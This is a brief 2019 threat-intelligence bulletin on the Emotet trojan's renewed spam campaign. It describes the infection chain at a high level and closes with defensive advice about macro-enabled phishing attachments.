Emotet Is Back: Botnet Springs Back to Life with New Spam Campaign (Sep 16, 2019)
The threat intelligence team at MalwareBytes Labs have identified an active spam distribution campaign by threat actors behind the “Emotet” trojan. Emotet’s creators are using sophisticated spearphising functions, including referencing the user by name and hijacking email threads, to target businesses across the globe. The malicious emails lure the victim into opening the attached macro-enabled document, starting the infection process. The PowerShell command triggered by the macro attempts to download Emotet from compromised sites, and once installed, begins spreading laterally to other endpoints on the network. Emotet serves as a delivery vector for more dangerous payloads, such as TrickBot and other ransomware families.
Recommendation: Files that request content be enabled to properly view the document are often signs of a phishing attack. If such a file is sent to you via a known and trusted sender, that individual should be contacted to verify the authenticity of the attachment prior to opening. Thus, any such file attachment sent by unknown senders should be viewed with the utmost scrutiny, and the attachments should be avoided and properly reported to appropriate personnel.
Indicators of Compromise (IOCs) associated with this story can be viewed by ThreatStream users here to identify potential malicious activity.